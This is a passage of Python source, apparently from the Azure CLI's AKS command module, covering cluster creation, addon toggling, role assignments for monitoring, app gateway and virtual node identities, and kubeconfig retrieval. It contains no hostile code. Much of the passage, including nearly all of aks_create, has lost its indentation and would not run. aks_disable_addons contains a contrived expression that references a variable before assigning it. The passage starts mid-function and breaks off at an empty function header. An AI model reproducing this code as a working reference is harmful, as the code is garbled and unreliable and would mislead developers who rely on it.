            return_msg = return_msg if return_msg else ""
            return_msg += "Test Passed!"
    except KeyboardInterrupt:
        # Let command processing finish gracefully after the user presses [Ctrl+C]
        pass
    finally:
        if in_cloud_console():
            # NOTE(review): hardcodes port 8001 instead of listen_port — confirm.
            requests.post('http://localhost:8888/closeport/8001')
    return return_msg
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(
    cmd,
    client,
    resource_group_name,
    name,
    disable_browser=False,
    listen_address="127.0.0.1",
    listen_port="8001",
):
    """Open the workloads view for an AKS cluster.

    Thin public wrapper over _aks_browse, pinned to the default
    MGMT_CONTAINERSERVICE resource type.
    """
    return _aks_browse(
        cmd,
        client,
        resource_group_name,
        name,
        disable_browser=disable_browser,
        listen_address=listen_address,
        listen_port=listen_port,
        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
    )
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
    """Grant 'Monitoring Metrics Publisher' on the cluster to the identity
    backing the monitoring addon.

    Uses the cluster's service principal when one exists (client_id not
    'msi'), otherwise the omsagent addon MSI. Failures are logged as
    warnings, never raised.
    """
    assignee = None
    is_service_principal = False

    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    has_valid_sp = (
        hasattr(result, 'service_principal_profile') and
        hasattr(result.service_principal_profile, 'client_id') and
        result.service_principal_profile.client_id.lower() != 'msi'
    )
    if has_valid_sp:
        logger.info('valid service principal exists, using it')
        assignee = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
        hasattr(result, 'addon_profiles') and
        CONST_MONITORING_ADDON_NAME in result.addon_profiles and
        hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity') and
        hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id')
    ):
        logger.info('omsagent MSI exists, using it')
        assignee = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id

    if assignee is None:
        logger.warning('Could not find service principal or user assigned MSI for role'
                       'assignment')
    elif not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
                                  assignee, is_service_principal, scope=cluster_resource_id):
        logger.warning('Could not create a role assignment for Monitoring addon. '
                       'Are you an Owner on this subscription?')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
    """Grant the ingress-appgw addon identity the role assignments it needs.

    Picks the cluster's service principal when one exists, otherwise the
    addon's managed identity, then assigns depending on the addon config:
      - 'Contributor' on the gateway's resource group (existing gateway id),
      - 'Network Contributor' on a configured subnet id,
      - 'Contributor' on the agent pool's vnet (subnet given only as CIDR).
    Failures are logged as warnings, never raised.

    :param result: the ManagedCluster returned by the create/update call.
    :param cmd: CLI command context (provides cli_ctx).
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    # NOTE(review): unlike the monitoring variant this compares client_id to
    # 'msi' case-sensitively — confirm that is intentional.
    if (
        hasattr(result, 'service_principal_profile') and
        hasattr(result.service_principal_profile, 'client_id') and
        result.service_principal_profile.client_id != 'msi'
    ):
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
        (hasattr(result, 'addon_profiles')) and
        (CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
        (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
        (hasattr(
            result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
    ):
        service_principal_msi_id = result.addon_profiles[
            CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
        from msrestazure.tools import parse_resource_id, resource_id
        if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
            # Existing gateway: Contributor on the gateway's resource group.
            appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
            parsed_appgw_id = parse_resource_id(appgw_id)
            appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
                                         resource_group=parsed_appgw_id["resource_group"])
            if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                        service_principal_msi_id, is_service_principal, scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
        if CONST_INGRESS_APPGW_SUBNET_ID in config:
            # Pre-existing subnet: Network Contributor on that subnet.
            subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        service_principal_msi_id, is_service_principal, scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
        if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
            # Subnet given only as a CIDR: Contributor on the agent pool's
            # vnet so the addon can create the subnet there.
            if result.agent_pool_profiles[0].vnet_subnet_id is not None:
                parsed_subnet_vnet_id = parse_resource_id(
                    result.agent_pool_profiles[0].vnet_subnet_id)
                vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
                                      resource_group=parsed_subnet_vnet_id["resource_group"],
                                      namespace="Microsoft.Network",
                                      type="virtualNetworks",
                                      name=parsed_subnet_vnet_id["name"])
                if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                            service_principal_msi_id, is_service_principal, scope=vnet_id):
                    logger.warning('Could not create a role assignment for virtual network: %s '
                                   'specified in %s addon. '
                                   'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
    """Grant 'Contributor' on the cluster's vnet to the identity backing the
    virtual-node addon.

    Uses the cluster's service principal when one exists (client_id not
    'msi'), otherwise the addon MSI. Failures are logged as warnings.
    """
    # Remove trailing "/subnets/<SUBNET_NAME>" (two path segments) to get the vnet id.
    vnet_id = vnet_subnet_id.rpartition('/')[0]
    vnet_id = vnet_id.rpartition('/')[0]

    os_type = 'Linux'
    addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    assignee = None
    is_service_principal = False

    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id.lower() != 'msi'):
        logger.info('valid service principal exists, using it')
        assignee = result.service_principal_profile.client_id
        is_service_principal = True
    elif (hasattr(result, 'addon_profiles') and
          addon_name in result.addon_profiles and
          hasattr(result.addon_profiles[addon_name], 'identity') and
          hasattr(result.addon_profiles[addon_name].identity, 'object_id')):
        logger.info('virtual node MSI exists, using it')
        assignee = result.addon_profiles[addon_name].identity.object_id

    if assignee is None:
        logger.warning('Could not find service principal or user assigned MSI for role'
                       'assignment')
    elif not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                  assignee, is_service_principal, scope=vnet_id):
        logger.warning('Could not create a role assignment for virtual node addon. '
                       'Are you an Owner on this subscription?')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
fqdn_subdomain=None,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_encryption_at_host=False,
assign_kubelet_identity=None,
enable_ultra_ssd=False,
edge_zone=None,
no_wait=False,
yes=False,
enable_azure_rbac=False):
ManagedClusterWindowsProfile = cmd.get_models('ManagedClusterWindowsProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceNetworkProfile = cmd.get_models('ContainerServiceNetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceLinuxProfile = cmd.get_models('ContainerServiceLinuxProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshConfiguration = cmd.get_models('ContainerServiceSshConfiguration',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshPublicKey = cmd.get_models('ContainerServiceSshPublicKey',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAgentPoolProfile = cmd.get_models('ManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties = cmd.get_models(
'ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedCluster = cmd.get_models('ManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties = cmd.get_models(
'Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise MutuallyExclusiveArgumentError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError(
'Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(
outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
aci_subnet_name,
vnet_subnet_id,
appgw_name,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise ArgumentUsageError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
# ids -> i_ds due to track 2 naming issue
admin_group_object_i_ds=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if enable_azure_rbac is True:
raise ArgumentUsageError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if not enable_managed_identity and assign_identity:
raise ArgumentUsageError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
# pylint: disable=line-too-long
assign_identity: Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
# pylint: disable=line-too-long
raise ArgumentUsageError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
# pylint: disable=line-too-long
'kubeletidentity': ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(
cmd.cli_ctx,
cluster_identity_object_id,
assign_kubelet_identity)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
identity_profile=identity_profile
)
use_custom_private_dns_zone = False
if private_dns_zone:
if not enable_private_cluster:
raise InvalidArgumentValueError("Invalid private dns zone for public cluster. "
"It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise InvalidArgumentValueError(
private_dns_zone + " is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise ArgumentUsageError("--fqdn-subdomain should only be used for "
"private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if edge_zone:
ExtendedLocation = cmd.get_models('ExtendedLocation',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ExtendedLocationTypes = cmd.get_models('ExtendedLocationTypes',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
mc.extended_location = ExtendedLocation(
name=edge_zone,
type=ExtendedLocationTypes.EDGE_ZONE
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {
'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
custom_headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable one or more addons on a managed cluster.

    :param addons: comma-separated addon names to turn off.
    :param no_wait: when True, do not block on the long-running update.
    """
    managed_cluster = client.get(resource_group_name, name)
    sub_id = get_subscription_id(cmd.cli_ctx)
    # Flip the requested addon profiles off on the local model first ...
    updated = _update_addons(
        cmd,
        updated if False else managed_cluster,
        sub_id,
        resource_group_name,
        name,
        addons,
        enable=False,
        no_wait=no_wait)
    # ... then send the managed cluster representation to update the addon profiles.
    return sdk_no_wait(no_wait, client.begin_create_or_update,
                       resource_group_name, name, updated)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
                      workspace_resource_id=None,
                      subnet_name=None,
                      appgw_name=None,
                      appgw_subnet_cidr=None,
                      appgw_id=None,
                      appgw_subnet_id=None,
                      appgw_watch_namespace=None,
                      enable_sgxquotehelper=False,
                      no_wait=False):
    """Enable one or more addons on an existing managed cluster.

    Fetches the cluster, toggles the requested addon profiles on via
    ``_update_addons``, and pushes the updated representation back.  For
    addons that need a post-creation role assignment (monitoring, ingress
    application gateway, virtual node) the operation is awaited even when
    callers pass ``no_wait=True``, because the assignment needs the result.

    :param addons: comma-separated addon names to enable.
    :param workspace_resource_id: Log Analytics workspace for monitoring.
    :param no_wait: skip waiting, unless a role assignment forces a wait.
    """
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
                              workspace_resource_id=workspace_resource_id,
                              subnet_name=subnet_name,
                              appgw_name=appgw_name,
                              appgw_subnet_cidr=appgw_subnet_cidr,
                              appgw_id=appgw_id,
                              appgw_subnet_id=appgw_subnet_id,
                              appgw_watch_namespace=appgw_watch_namespace,
                              enable_sgxquotehelper=enable_sgxquotehelper,
                              no_wait=no_wait)
    # Determine which addons that require client-side role assignments ended
    # up enabled on the updated model.
    enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
        and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
        and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
    os_type = 'Linux'
    virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
                           instance.addon_profiles[virtual_node_addon_name].enabled)
    need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
    if need_pull_for_result:
        if enable_monitoring:
            _ensure_container_insights_for_monitoring(
                cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(
            client.begin_create_or_update(resource_group_name, name, instance))
        if enable_monitoring:
            cloud_name = cmd.cli_ctx.cloud.name
            # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
            if cloud_name.lower() == 'azurecloud':
                from msrestazure.tools import resource_id
                cluster_resource_id = resource_id(
                    subscription=subscription_id,
                    resource_group=resource_group_name,
                    namespace='Microsoft.ContainerService', type='managedClusters',
                    name=name
                )
                _add_monitoring_role_assignment(
                    result, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(result, cmd)
        if enable_virtual_node:
            # All agent pool will reside in the same vnet, we will grant vnet level Contributor role
            # in later function, so using a random agent pool here is OK
            random_agent_pool = result.agent_pool_profiles[0]
            if random_agent_pool.vnet_subnet_id != "":
                _add_virtual_node_role_assignment(
                    cmd, result, random_agent_pool.vnet_subnet_id)
            # Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
            # we don't need to handle it in client side in this case.
    else:
        # No role assignment depends on the result; honor no_wait normally.
        result = sdk_no_wait(no_wait, client.begin_create_or_update,
                             resource_group_name, name, instance)
    return result
def aks_get_versions(cmd, client, location):
    """Return the orchestrator (Kubernetes) versions available for managed clusters in *location*."""
    orchestrators = client.list_orchestrators(
        location, resource_type='managedClusters')
    return orchestrators
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
                        path=os.path.join(os.path.expanduser(
                            '~'), '.kube', 'config'),
                        overwrite_existing=False, context_name=None):
    """Fetch a kubeconfig for the cluster and print or merge it into *path*.

    :param admin: fetch cluster-admin credentials instead of user credentials.
    :param path: target kubeconfig file; defaults to ``~/.kube/config``.
    :param context_name: optional kubeconfig context name override.
    """
    if admin:
        creds = client.list_cluster_admin_credentials(
            resource_group_name, name)
    else:
        creds = client.list_cluster_user_credentials(
            resource_group_name, name)
    # -f/--file wins over the environment: only honor KUBECONFIG when the
    # caller left *path* at its default value.
    default_path = os.path.join(os.path.expanduser('~'), '.kube', 'config')
    if "KUBECONFIG" in os.environ and path == default_path:
        path = os.environ["KUBECONFIG"]
    if not creds:
        raise CLIError("No Kubernetes credentials found.")
    try:
        # Take the first returned kubeconfig; decoding or merging failures
        # surface as a single user-facing error.
        kubeconfig = creds.kubeconfigs[0].value.decode(encoding='UTF-8')
        _print_or_merge_credentials(
            path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
    """List managed clusters, optionally scoped to a single resource group."""
    clusters = (client.list_by_resource_group(resource_group_name)
                if resource_group_name
                else client.list())
    return _remove_nulls(list(clusters))
def aks_show(cmd, client, resource_group_name, name):
